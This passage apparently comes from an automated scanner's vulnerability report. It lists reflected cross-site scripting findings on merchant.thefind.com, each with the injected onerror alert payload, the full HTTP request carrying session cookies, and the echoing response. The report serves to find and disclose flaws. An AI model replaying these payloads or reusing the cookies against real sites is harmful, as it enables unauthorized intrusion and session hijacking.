1.27. https://merchant.thefind.com/css/utils/ui.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/css/utils/ui.css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c0fe6<img%20src%3da%20onerror%3dalert(1)>c0de10ca2e4 was submitted in the REST URL parameter 3. This input was echoed as c0fe6<img src=a onerror=alert(1)>c0de10ca2e4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /css/utils/c0fe6<img%20src%3da%20onerror%3dalert(1)>c0de10ca2e4 HTTP/1.1
Host: merchant.thefind.com
Connection: keep-alive
Referer: https://merchant.thefind.com/mc/b043a%3Cimg%20src%3da%20onerror%3dalert(1)%3Eab31362be6f
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-486391256-1299459383931; __utmz=1.1299459384.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.897036025.1299459384.1299459384.1299459384.1; flsid=6997ae4312fc772848dc3a226943369b; fl-uid=bfa3e7209f5ea363cbb5a800fe6fe291%2C1%2C1299583012

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 11:56:49 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.0-8+etch15
Expires: Tue, 23 Feb 1999 18:30:00 GMT
Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT
Content-Language: en
Vary: User-Agent,Accept-Encoding
Status: 200 OK
X-Content-Encoded-By: class.Conteg.0.13
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 9547

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:elation="http://www.ajaxelation.com/xmlns">
<head>
<title>Merchant Center-TheFind.com - Shopping Search Reinvented - What can we find
...[SNIP]...
<div id="tf_container">
[Could not find component: css.utils.c0fe6<img src=a onerror=alert(1)>c0de10ca2e4]
</div>
...[SNIP]...

1.28. https://merchant.thefind.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d2797<img%20src%3da%20onerror%3dalert(1)>29f922eedee was submitted in the REST URL parameter 1. This input was echoed as d2797<img src=a onerror=alert(1)>29f922eedee in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /d2797<img%20src%3da%20onerror%3dalert(1)>29f922eedee HTTP/1.1
Host: merchant.thefind.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-486391256-1299459383931; __utmz=1.1299459384.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.897036025.1299459384.1299459384.1299459384.1; flsid=6997ae4312fc772848dc3a226943369b; fl-uid=bfa3e7209f5ea363cbb5a800fe6fe291%2C1%2C1299583012

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 11:55:18 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.0-8+etch15
Expires: Tue, 23 Feb 1999 18:30:00 GMT
Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT
Content-Language: en
Vary: User-Agent,Accept-Encoding
Status: 200 OK
X-Content-Encoded-By: class.Conteg.0.13
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 9537

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:elation="http://www.ajaxelation.com/xmlns">
<head>
<title>Merchant Center-TheFind.com - Shopping Search Reinvented - What can we find
...[SNIP]...
<div id="tf_container">
[Could not find component: d2797<img src=a onerror=alert(1)>29f922eedee]
</div>
...[SNIP]...

1.29. https://merchant.thefind.com/mc/MerchantProgram.fhtml [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/mc/MerchantProgram.fhtml

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b5036<img%20src%3da%20onerror%3dalert(1)>a086493783a was submitted in the REST URL parameter 1. This input was echoed as b5036<img src=a onerror=alert(1)>a086493783a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /mcb5036<img%20src%3da%20onerror%3dalert(1)>a086493783a/MerchantProgram.fhtml HTTP/1.1
Host: merchant.thefind.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 11:16:27 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.0-8+etch15
Set-Cookie: flsid=0b4b981bb9356ce161616f1f41763fdd; path=/
Expires: Tue, 23 Feb 1999 18:30:00 GMT
Cache-Control: must-revalidate, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT
Set-Cookie: fl-uid=73d07e040ac859638374b5761dfdb2ed%2C1%2C1299582987; expires=Wed, 07-Mar-2012 11:16:27 GMT; path=/; domain=.thefind.com
Content-Language: en
Vary: Accept-Encoding
Status: 200 OK
Content-Length: 9566
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:elation="http://www.ajaxelation.com/xmlns">
<head>
<title>Merchant Center-TheFind.com - Shopping Search Reinvented - What can we find
...[SNIP]...
<div id="tf_container">
[Could not find component: mcb5036<img src=a onerror=alert(1)>a086493783a.MerchantProgram]
</div>
...[SNIP]...

1.30. https://merchant.thefind.com/mc/MerchantProgram.fhtml [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/mc/MerchantProgram.fhtml

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b043a<img%20src%3da%20onerror%3dalert(1)>ab31362be6f was submitted in the REST URL parameter 2. This input was echoed as b043a<img src=a onerror=alert(1)>ab31362be6f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /mc/b043a<img%20src%3da%20onerror%3dalert(1)>ab31362be6f HTTP/1.1
Host: merchant.thefind.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 11:16:52 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.0-8+etch15
Set-Cookie: flsid=6997ae4312fc772848dc3a226943369b; path=/
Expires: Tue, 23 Feb 1999 18:30:00 GMT
Cache-Control: must-revalidate, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT
Set-Cookie: fl-uid=bfa3e7209f5ea363cbb5a800fe6fe291%2C1%2C1299583012; expires=Wed, 07-Mar-2012 11:16:52 GMT; path=/; domain=.thefind.com
Content-Language: en
Vary: Accept-Encoding
Status: 200 OK
Content-Length: 9540
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:elation="http://www.ajaxelation.com/xmlns">
<head>
<title>Merchant Center-TheFind.com - Shopping Search Reinvented - What can we find
...[SNIP]...
<div id="tf_container">
[Could not find component: mc.b043a<img src=a onerror=alert(1)>ab31362be6f]
</div>
...[SNIP]...

1.31. https://merchant.thefind.com/mc/a [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/mc/a

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload cce1a<img%20src%3da%20onerror%3dalert(1)>521ec912dc1 was submitted in the REST URL parameter 1. This input was echoed as cce1a<img src=a onerror=alert(1)>521ec912dc1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /mccce1a<img%20src%3da%20onerror%3dalert(1)>521ec912dc1/a HTTP/1.1
Host: merchant.thefind.com
Connection: keep-alive
Referer: https://merchant.thefind.com/mc/b043a%3Cimg%20src%3da%20onerror%3dalert(1)%3Eab31362be6f
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-486391256-1299459383931; __utmz=1.1299459384.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.897036025.1299459384.1299459384.1299459384.1; flsid=6997ae4312fc772848dc3a226943369b; fl-uid=bfa3e7209f5ea363cbb5a800fe6fe291%2C1%2C1299583012

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 11:55:30 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.0-8+etch15
Expires: Tue, 23 Feb 1999 18:30:00 GMT
Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT
Content-Language: en
Vary: User-Agent,Accept-Encoding
Status: 200 OK
X-Content-Encoded-By: class.Conteg.0.13
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 9541

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:elation="http://www.ajaxelation.com/xmlns">
<head>
<title>Merchant Center-TheFind.com - Shopping Search Reinvented - What can we find
...[SNIP]...
<div id="tf_container">
[Could not find component: mccce1a<img src=a onerror=alert(1)>521ec912dc1.a]
</div>
...[SNIP]...

1.32. https://merchant.thefind.com/mc/a [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/mc/a

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bdadf<img%20src%3da%20onerror%3dalert(1)>cbaf17d68ab was submitted in the REST URL parameter 2. This input was echoed as bdadf<img src=a onerror=alert(1)>cbaf17d68ab in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /mc/abdadf<img%20src%3da%20onerror%3dalert(1)>cbaf17d68ab HTTP/1.1
Host: merchant.thefind.com
Connection: keep-alive
Referer: https://merchant.thefind.com/mc/b043a%3Cimg%20src%3da%20onerror%3dalert(1)%3Eab31362be6f
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-486391256-1299459383931; __utmz=1.1299459384.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.897036025.1299459384.1299459384.1299459384.1; flsid=6997ae4312fc772848dc3a226943369b; fl-uid=bfa3e7209f5ea363cbb5a800fe6fe291%2C1%2C1299583012

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 11:55:46 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.0-8+etch15
Expires: Tue, 23 Feb 1999 18:30:00 GMT
Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT
Content-Language: en
Vary: User-Agent,Accept-Encoding
Status: 200 OK
X-Content-Encoded-By: class.Conteg.0.13
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 9541

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:elation="http://www.ajaxelation.com/xmlns">
<head>
<title>Merchant Center-TheFind.com - Shopping Search Reinvented - What can we find
...[SNIP]...
<div id="tf_container">
[Could not find component: mc.abdadf<img src=a onerror=alert(1)>cbaf17d68ab]
</div>
...[SNIP]...

1.33. https://merchant.thefind.com/scripts/mc/calendar.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/scripts/mc/calendar.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e34c5<img%20src%3da%20onerror%3dalert(1)>0fd85524c7e was submitted in the REST URL parameter 1. This input was echoed as e34c5<img src=a onerror=alert(1)>0fd85524c7e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /scriptse34c5<img%20src%3da%20onerror%3dalert(1)>0fd85524c7e/mc/calendar.js HTTP/1.1
Host: merchant.thefind.com
Connection: keep-alive
Referer: https://merchant.thefind.com/mc/b043a%3Cimg%20src%3da%20onerror%3dalert(1)%3Eab31362be6f
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-486391256-1299459383931; __utmz=1.1299459384.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.897036025.1299459384.1299459384.1299459384.1; flsid=6997ae4312fc772848dc3a226943369b; fl-uid=bfa3e7209f5ea363cbb5a800fe6fe291%2C1%2C1299583012

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 11:57:16 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.0-8+etch15
Expires: Tue, 23 Feb 1999 18:30:00 GMT
Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT
Content-Language: en
Vary: Accept-Encoding
Status: 200 OK
Content-Length: 208
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript; charset=utf-8

{"flsid":"6997ae4312fc772848dc3a226943369b","data":{"name":"calendar","fullname":"scriptse34c5<img src=a onerror=alert(1)>0fd85524c7e.mc.calendar","path":".","type":"missing","components":null,"payload":""}}

1.34. https://merchant.thefind.com/scripts/mc/calendar.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/scripts/mc/calendar.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 37251<img%20src%3da%20onerror%3dalert(1)>76b8fd5f54e was submitted in the REST URL parameter 2. This input was echoed as 37251<img src=a onerror=alert(1)>76b8fd5f54e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /scripts/mc37251<img%20src%3da%20onerror%3dalert(1)>76b8fd5f54e/calendar.js HTTP/1.1
Host: merchant.thefind.com
Connection: keep-alive
Referer: https://merchant.thefind.com/mc/b043a%3Cimg%20src%3da%20onerror%3dalert(1)%3Eab31362be6f
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-486391256-1299459383931; __utmz=1.1299459384.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.897036025.1299459384.1299459384.1299459384.1; flsid=6997ae4312fc772848dc3a226943369b; fl-uid=bfa3e7209f5ea363cbb5a800fe6fe291%2C1%2C1299583012

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 11:58:06 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.0-8+etch15
Expires: Tue, 23 Feb 1999 18:30:00 GMT
Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT
Content-Language: en
Vary: Accept-Encoding
Status: 200 OK
Content-Length: 208
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript; charset=utf-8

{"flsid":"6997ae4312fc772848dc3a226943369b","data":{"name":"calendar","fullname":"scripts.mc37251<img src=a onerror=alert(1)>76b8fd5f54e.calendar","path":".","type":"missing","components":null,"payload":""}}

1.35. https://merchant.thefind.com/scripts/mc/calendar.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/scripts/mc/calendar.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d011a<img%20src%3da%20onerror%3dalert(1)>dbd4820d371 was submitted in the REST URL parameter 3. This input was echoed as d011a<img src=a onerror=alert(1)>dbd4820d371 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /scripts/mc/d011a<img%20src%3da%20onerror%3dalert(1)>dbd4820d371 HTTP/1.1
Host: merchant.thefind.com
Connection: keep-alive
Referer: https://merchant.thefind.com/mc/b043a%3Cimg%20src%3da%20onerror%3dalert(1)%3Eab31362be6f
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-486391256-1299459383931; __utmz=1.1299459384.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.897036025.1299459384.1299459384.1299459384.1; flsid=6997ae4312fc772848dc3a226943369b; fl-uid=bfa3e7209f5ea363cbb5a800fe6fe291%2C1%2C1299583012

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 11:58:57 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.0-8+etch15
Expires: Tue, 23 Feb 1999 18:30:00 GMT
Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT
Content-Language: en
Vary: User-Agent,Accept-Encoding
Status: 200 OK
X-Content-Encoded-By: class.Conteg.0.13
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 9548

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:elation="http://www.ajaxelation.com/xmlns">
<head>
<title>Merchant Center-TheFind.com - Shopping Search Reinvented - What can we find
...[SNIP]...
<div id="tf_container">
[Could not find component: scripts.mc.d011a<img src=a onerror=alert(1)>dbd4820d371]
</div>
...[SNIP]...

1.36. https://merchant.thefind.com/scripts/mc/callout.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/scripts/mc/callout.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 50415<img%20src%3da%20onerror%3dalert(1)>df62c87613b was submitted in the REST URL parameter 1. This input was echoed as 50415<img src=a onerror=alert(1)>df62c87613b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /scripts50415<img%20src%3da%20onerror%3dalert(1)>df62c87613b/mc/callout.js HTTP/1.1
Host: merchant.thefind.com
Connection: keep-alive
Referer: https://merchant.thefind.com/mc/b043a%3Cimg%20src%3da%20onerror%3dalert(1)%3Eab31362be6f
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-486391256-1299459383931; __utmz=1.1299459384.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.897036025.1299459384.1299459384.1299459384.1; flsid=6997ae4312fc772848dc3a226943369b; fl-uid=bfa3e7209f5ea363cbb5a800fe6fe291%2C1%2C1299583012

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 11:56:48 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.0-8+etch15
Expires: Tue, 23 Feb 1999 18:30:00 GMT
Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT
Content-Language: en
Vary: Accept-Encoding
Status: 200 OK
Content-Length: 206
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript; charset=utf-8

{"flsid":"6997ae4312fc772848dc3a226943369b","data":{"name":"callout","fullname":"scripts50415<img src=a onerror=alert(1)>df62c87613b.mc.callout","path":".","type":"missing","components":null,"payload":""}}

1.37. https://merchant.thefind.com/scripts/mc/callout.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/scripts/mc/callout.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a994d<img%20src%3da%20onerror%3dalert(1)>9f2ea817c9f was submitted in the REST URL parameter 2. This input was echoed as a994d<img src=a onerror=alert(1)>9f2ea817c9f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /scripts/mca994d<img%20src%3da%20onerror%3dalert(1)>9f2ea817c9f/callout.js HTTP/1.1
Host: merchant.thefind.com
Connection: keep-alive
Referer: https://merchant.thefind.com/mc/b043a%3Cimg%20src%3da%20onerror%3dalert(1)%3Eab31362be6f
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-486391256-1299459383931; __utmz=1.1299459384.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.897036025.1299459384.1299459384.1299459384.1; flsid=6997ae4312fc772848dc3a226943369b; fl-uid=bfa3e7209f5ea363cbb5a800fe6fe291%2C1%2C1299583012

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 11:57:18 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.0-8+etch15
Expires: Tue, 23 Feb 1999 18:30:00 GMT
Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT
Content-Language: en
Vary: Accept-Encoding
Status: 200 OK
Content-Length: 206
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript; charset=utf-8

{"flsid":"6997ae4312fc772848dc3a226943369b","data":{"name":"callout","fullname":"scripts.mca994d<img src=a onerror=alert(1)>9f2ea817c9f.callout","path":".","type":"missing","components":null,"payload":""}}

1.38. https://merchant.thefind.com/scripts/mc/callout.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/scripts/mc/callout.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload afd28<img%20src%3da%20onerror%3dalert(1)>b99b4562ec5 was submitted in the REST URL parameter 3. This input was echoed as afd28<img src=a onerror=alert(1)>b99b4562ec5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /scripts/mc/afd28<img%20src%3da%20onerror%3dalert(1)>b99b4562ec5 HTTP/1.1
Host: merchant.thefind.com
Connection: keep-alive
Referer: https://merchant.thefind.com/mc/b043a%3Cimg%20src%3da%20onerror%3dalert(1)%3Eab31362be6f
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-486391256-1299459383931; __utmz=1.1299459384.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.897036025.1299459384.1299459384.1299459384.1; flsid=6997ae4312fc772848dc3a226943369b; fl-uid=bfa3e7209f5ea363cbb5a800fe6fe291%2C1%2C1299583012

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 11:58:08 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.0-8+etch15
Expires: Tue, 23 Feb 1999 18:30:00 GMT
Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT
Content-Language: en
Vary: User-Agent,Accept-Encoding
Status: 200 OK
X-Content-Encoded-By: class.Conteg.0.13
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 9548

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:elation="http://www.ajaxelation.com/xmlns">
<head>
<title>Merchant Center-TheFind.com - Shopping Search Reinvented - What can we find
...[SNIP]...
<div id="tf_container">
[Could not find component: scripts.mc.afd28<img src=a onerror=alert(1)>b99b4562ec5]
</div>
...[SNIP]...

1.39. https://merchant.thefind.com/scripts/mc/claim_store.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/scripts/mc/claim_store.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e817d<img%20src%3da%20onerror%3dalert(1)>6ecec1b0e72 was submitted in the REST URL parameter 1. This input was echoed as e817d<img src=a onerror=alert(1)>6ecec1b0e72 in the application's response.

